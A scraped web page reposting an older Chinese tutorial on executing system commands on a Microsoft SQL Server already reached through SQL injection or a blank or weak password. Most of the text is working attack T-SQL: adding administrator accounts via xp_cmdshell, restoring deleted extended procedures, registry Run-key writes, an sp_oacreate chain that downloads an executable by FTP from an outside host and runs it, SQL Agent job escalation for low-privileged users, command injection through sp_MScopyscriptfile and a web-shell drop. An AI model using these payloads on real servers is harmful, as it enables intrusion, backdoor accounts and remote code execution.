怎样在MSSQL执行命令-MySQL 튜토리얼-php.cn

집

데이터 베이스

MySQL 튜토리얼

怎样在MSSQL执行命令

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 04:21 PM

mssql 주문하다 어떻게 구현하다

假设一台主机开了1433端口我们已通过SQL注入或是空弱密码远程连接能有哪些办法加一个系统管理员用户呢(或是执行系统命令) 1).XP_CMDSHELL 'cmd.exe /c net user aaa bbb /add' 人人都知道的办法,最大的好处是有回显,但是最怕 if exists (select * from dbo.

　　假设一台主机开了1433端口我们已通过SQL注入或是空弱密码远程连接

　　能有哪些办法加一个系统管理员用户呢(或是执行系统命令)

　　1).XP_CMDSHELL 'cmd.exe /c net user aaa bbb /add'

　　人人都知道的办法,最大的好处是有回显,但是最怕

　　if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

　　exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

　　通过上面的T-SQL语句就可以把这个扩展储存删了

　　我们一般可以用

　　2k:

　　EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

　　SQL97:

　　EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xpsql70.dll'

　　就还原了.

　　但是有的人知道sp_addextendedproc也只不过是一个储存过程一样可以删除的

　　Drop PROCEDURE sp_addextendedproc

　　if exists (select * from

　　dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

　　OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

　　exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

　　还原:

　　create procedure sp_addextendedproc --- 1996/08/30 20:13

　　@functname nvarchar(517),/* (owner.)name of function to call */

　　@dllname varchar(255)/* name of DLL containing function */

　　set implicit_transactions off

　　if @@trancount > 0

　　begin

　　raiserror(15002,-1,-1,'sp_addextendedproc')

　　return (1)

　　end

　　** Create the extended procedure mapping.

　　dbcc addextendedproc( @functname, @dllname)

　　return (0) -- sp_addextendedproc

　　呀呀写了这么多其实有个最简单的保护办法:

　　先NET stop mssqlserver,然后把xplog70.dll(SQL97下用xpsql70.dll)删了

　　再把服务打开就可以了

　　2)看了上面的你就明白了xp_cmdshell最终是可以被删除的没别的办法了吗?

　　有写注册表三:

　　xp_regwrite 'HKEY_LOCAL_MacHINE','SOFTWAREMicrosoftWindowscurrentversionrun', 'czy82','REG_SZ', net user czy bb /add

　　其实注册表还有好几个地方可以写的比如说注册表中的WEB浏览设置

　　用写注册表的办法不好的地方是不但没有回显而且不能马上运行实不实用我也不知道了

　　declare @s int

　　exec sp_oacreate "wscript.shell",@s out

　　--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open ASP.7i24.com>c:a.txt"

　　--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:a.txt"

　　--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo get server.exe>>c:a.txt"

　　--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo close>>c:a.txt"

　　--exec sp_oamethod @s,"run",NULL,"cmd.exe /c ftp -s:c:a.txt"

　　exec sp_oamethod @s,"run",NULL,"cmd.exe /c server"

　　对了正如你看到的我们还可以使用sp_oacreate和sp_oamethod在它们的作用下我们可以

　　调用系统的控件比如说fso,wsh,shell什么的,但是有个问题是并不能象xp_cmdshell那样

　　马上看到结果真的不能吗看下面的:

　　declare @s int,@o int ,@f int,@str nvarchar(4000)

　　/*exec sp_oacreate "wscript.shell",@s out

　　exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user>c:temp.txt"*/

　　exec sp_oacreate "scripting.filesystemobject", @o out

　　exec sp_oamethod @o, "opentextfile", @f out,"c:temp.txt", 1

　　exec sp_oamethod @f, "readall",@str out

　　print @str

　　先执行注解内的然后执行外面的其实原理很简单就是利用>把结果写到一个文件中然后用

　　fso来读出来!很实用的

　　use msdb; --这儿不要是master哟

　　exec sp_add_job @job_name='czy82';

　　exec sp_add_jobstep @job_name='czy82',@step_name = 'Exec my sql',@subsystem='CMDEXEC',@command='dir c:>c:b.txt';

　　exec sp_add_jobserver @job_name = 'czy82',@server_name = 'smscomputer';

　　exec sp_start_job @job_name='czy82';

　　利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql后面的我们就可以

　　执行tsql语句了.

　　对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名

　　第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)

　　net start SQLSERVERAGENT

　　对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的

　　USE msdb

　　EXEC sp_add_job @job_name = 'GetSystemOnSQL',

　　@enabled = 1,

　　@description = 'This will give a low privileged user Access to

　　xp_cmdshell',

　　@delete_level = 1

　　EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',

　　@step_name = 'Exec my sql',

　　@subsystem = 'TSQL',

　　@command = 'exec master..xp_execresultset N''select ''''exec

　　master..xp_cmdshell "dir > c:agent-job-results.txt"'''''',N''Master'''

　　EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',

　　@server_name = '你的SQL的服务器名'

　　EXEC sp_start_job @job_name = 'GetSystemOnSQL'

　　不要怀疑上面的代码我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以

　　才让我们可以以public执行xp_cmdshell

　　5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)

　　在安焦有文章:?vul_id=2968

　　USE msdb

　　EXEC sp_add_job @job_name = 'ArbitraryFileCreate',

　　@enabled = 1,

　　@description = 'This will create a file called c:sqlafc123.txt',

　　@delete_level = 1

　　EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',

　　@step_name = 'SQLA

　　FC',

　　@subsystem = 'TSQL',

　　@command = 'select ''hello, this file was created by the SQL Agent.''',

　　@output_file_name = 'c:sqlafc123.txt'

　　EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',

　　@server_name = 'SERVER_NAME'

　　EXEC sp_start_job @job_name = 'ArbitraryFileCreate'

　　如果subsystem选的是:tsql在生成的文件的头部有如下内容

　　??揂rbitraryFileCreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19

　　----------------------------------------------

　　hello, this file was created by the SQL Agent.

　　(1 ?????)

　　所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员

　　命令的VBs文件到启动目录!

　　6)关于sp_makewebtask(可以写任意内容任意文件名的文件)

　　关于sp_MScopyscriptfile 看下面的例子

　　declare @command varchar(100)

　　declare @scripfile varchar(200)

　　set concat_null_yields_null off

　　select @command='dir c: > "attackeripsharedir.txt"'

　　select @scripfile='c:autoexec.bat > nul" | ' + @command + ' | rd "'

　　exec sp_MScopyscriptfile @scripfile ,''

　　这两个东东都还在测试试哟

　　让MSSQL的public用户得到一个本机的web shell:)

　　sp_makewebtask @outputfile='d:smsa.asp',@charset=gb2312,

　　--@query='select '''''

　　--@query='select '''' '

　　@query='select ''

　　" method="POST">

，

본 웹사이트의 성명

핫 AI 도구

Video Face Swap

완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!

뜨거운 도구

뜨거운 주제

Gmail 이메일의 로그인 입구는 어디에 있나요?

7697

자바 튜토리얼

1640

Cakephp 튜토리얼

1393

라라벨 튜토리얼

1287

PHP 튜토리얼

1229

Related knowledge

Windows 11/10에서 SUDO 명령을 실행하는 방법 Mar 09, 2024 am 09:50 AM

sudo 명령을 사용하면 사용자는 수퍼유저 모드로 전환하지 않고도 상승된 권한 모드에서 명령을 실행할 수 있습니다. 이 기사에서는 Windows 시스템에서 sudo 명령과 유사한 기능을 시뮬레이션하는 방법을 소개합니다. 슈도사령부란 무엇인가? Sudo("superuser do"의 약어)는 Linux 및 MacOS와 같은 Unix 기반 운영 체제 사용자가 일반적으로 관리자가 보유하는 높은 권한으로 명령을 실행할 수 있도록 하는 명령줄 도구입니다. Windows 11/10에서 SUDO 명령 실행 그러나 최신 Windows 11 Insider 미리 보기 버전이 출시되면서 Windows 사용자는 이제 이 기능을 경험할 수 있습니다. 이 새로운 기능을 통해 사용자는 다음을 수행할 수 있습니다.

Win11에서 네트워크 카드의 MAC 주소를 확인하는 방법 Win11에서 네트워크 카드의 MAC 주소를 얻는 명령을 사용하는 방법은 무엇입니까? Feb 29, 2024 pm 04:34 PM

이 문서에서는 명령 프롬프트(CommandPrompt)를 사용하여 Win11 시스템에서 네트워크 어댑터의 물리적 주소(MAC 주소)를 찾는 방법을 독자에게 소개합니다. MAC 주소는 네트워크 통신에서 중요한 역할을 하는 네트워크 인터페이스 카드(NIC)의 고유 식별자입니다. 명령 프롬프트를 통해 사용자는 현재 컴퓨터에 있는 모든 네트워크 어댑터의 MAC 주소 정보를 쉽게 얻을 수 있으며 이는 네트워크 문제 해결, 네트워크 설정 구성 및 기타 작업에 매우 유용합니다. 방법 1: "명령 프롬프트" 사용 1. [Win+X] 키 조합을 누르거나 [마우스 오른쪽 버튼 클릭] 작업 표시줄의 [Windows 로고]를 클릭하고 메뉴 항목이 열리면 [실행]을 선택합니다. .창을 실행하고 [cmd] 명령어를 입력한 후

Hyperv 고급 세션 모드는 어디에 있습니까? Win11에서 명령을 사용하여 Hyper-V 고급 세션 모드를 활성화 또는 비활성화하는 팁 Feb 29, 2024 pm 05:52 PM

Win11 시스템에서는 명령을 통해 Hyper-V 고급 세션 모드를 활성화하거나 비활성화할 수 있습니다. 이 문서에서는 명령을 사용하여 사용자가 시스템에서 Hyper-V 기능을 더 잘 관리하고 제어할 수 있도록 돕는 방법을 소개합니다. Hyper-V는 Microsoft에서 제공하는 가상화 기술로 Windows Server와 Windows 10 및 11(Home Edition 제외)에 내장되어 있어 사용자가 Windows 시스템에서 가상 운영 체제를 실행할 수 있습니다. 가상 머신은 호스트 운영 체제에서 격리되어 있지만 설정을 통해 사운드 카드, 저장 장치 등 호스트 리소스를 계속 사용할 수 있습니다. 주요 설정 중 하나는 고급 세션 모드를 활성화하는 것입니다. 고급 세션 모드는 Hyper입니다.

매우 실용적입니다! 당신을 리눅스 마스터로 만들어주는 Sar 명령 Mar 01, 2024 am 08:01 AM

1. 개요 sar 명령은 시스템 활동에서 수집된 데이터를 통해 시스템 사용 보고서를 표시합니다. 이러한 보고서는 다양한 섹션으로 구성되어 있으며 각 섹션에는 데이터 유형과 데이터 수집 시기가 포함되어 있습니다. sar 명령의 기본 모드는 CPU에 액세스하는 다양한 리소스(예: 사용자, 시스템, I/O 스케줄러 등)에 대해 다양한 시간 증분으로 CPU 사용량을 표시합니다. 또한 특정 기간 동안 유휴 CPU의 비율을 표시합니다. 각 데이터 포인트의 평균값은 보고서 하단에 나열됩니다. sar 보고서는 기본적으로 10분마다 데이터를 수집하지만 다양한 옵션을 사용하여 이러한 보고서를 필터링하고 조정할 수 있습니다. uptime 명령과 마찬가지로 sar 명령도 CPU 로드를 모니터링하는 데 도움이 될 수 있습니다. sar를 통해 과도한 부하 발생을 이해할 수 있다.

Ubuntu에서 PHP를 설치하고 MSSQL 연결을 구성하는 방법에 대한 자세한 가이드 Feb 29, 2024 am 11:15 AM

Ubuntu는 서버를 실행하는 데 일반적으로 사용되는 인기 있는 오픈 소스 운영 체제입니다. Ubuntu에 PHP를 설치하고 MSSQL 연결을 구성하는 것은 많은 개발자와 시스템 관리자가 자주 수행해야 하는 작업 중 하나입니다. 이 기사에서는 독자들에게 PHP 설치, Apache 설정, MSSQLServer 설치 등의 단계를 포함한 자세한 가이드를 제공하고 특정 코드 예제를 첨부합니다. 1단계: PHP 및 관련 확장 설치 먼저, PHP 연결을 지원하기 위해 PHP 및 관련 확장을 설치해야 합니다.

win11 위젯을 삭제하는 방법 Windows 11 위젯 기능 팁을 제거하는 명령 Apr 11, 2024 pm 05:19 PM

위젯은 Win11 시스템의 새로운 기능입니다. 그러나 일부 사용자가 위젯을 많이 사용하지 않고 공간을 차지하기 때문에 비활성화하려는 경우가 있습니다. 아래 편집기에서 작동 방법을 가르쳐 드리며 직접 사용해 보실 수 있습니다. 위젯이란 무엇입니까? 위젯은 Windows 바탕 화면에서 즐겨 사용하는 앱과 서비스의 동적 콘텐츠를 표시하는 작은 카드입니다. 이러한 위젯은 위젯 보드에 나타나며, 여기에서 귀하의 관심사를 반영하여 위젯을 검색하고, 고정하고, 고정 해제하고, 정렬하고, 크기를 조정하고, 사용자 정의할 수 있습니다. 위젯보드는 사용량에 따른 관련 위젯과 개인화된 콘텐츠를 표시하도록 최적화되어 있습니다. 실시간 날씨를 볼 수 있는 작업 표시줄 왼쪽 모서리에 있는 위젯 팔레트를 엽니다.

Linux의 아티팩트: eventfd의 원리 및 응용 Feb 13, 2024 pm 08:30 PM

Linux는 파이프, 신호, 메시지 큐, 공유 메모리 등과 같은 효율적인 프로세스 간 통신 메커니즘을 제공하는 강력한 운영 체제입니다. 하지만 더 간단하고 유연하며 효율적인 의사소통 방법이 있을까요? 대답은 '예'입니다. 그게 eventfd입니다. eventfd는 Linux 버전 2.6에 도입된 시스템 호출로, 이벤트 알림을 구현하는 데, 즉 파일 설명자를 통해 이벤트를 전달하는 데 사용할 수 있습니다. eventfd에는 커널이 유지 관리하는 64비트 부호 없는 정수 카운터가 포함되어 있습니다. 프로세스는 프로세스 간 통신을 달성하기 위해 이 파일 설명자를 읽고 쓰면서 카운터 값을 읽고 변경할 수 있습니다. eventfd의 장점은 무엇입니까? 그것은 다음과 같은 기능을 가지고 있습니다

Linux에서 서비스를 다시 시작하는 올바른 방법은 무엇입니까? Mar 15, 2024 am 09:09 AM

Linux에서 서비스를 다시 시작하는 올바른 방법은 무엇입니까? Linux 시스템을 사용하다 보면 서비스를 다시 시작해야 하는 상황이 자주 발생하지만, 서비스를 다시 시작할 때 서비스가 실제로 중지되지 않거나 시작되지 않는 등의 문제가 발생할 수도 있습니다. 따라서 서비스를 다시 시작하는 올바른 방법을 익히는 것이 매우 중요합니다. Linux에서는 일반적으로 systemctl 명령을 사용하여 시스템 서비스를 관리할 수 있습니다. systemctl 명령은 systemd 시스템 관리자의 일부입니다.

See all articles

怎样在MSSQL执行命令

핫 AI 도구

Undresser.AI Undress

AI Clothes Remover

Undress AI Tool

Clothoff.io

Video Face Swap

인기 기사

뜨거운 도구

메모장++7.3.1

SublimeText3 중국어 버전

스튜디오 13.0.1 보내기

드림위버 CS6

SublimeText3 Mac 버전

뜨거운 주제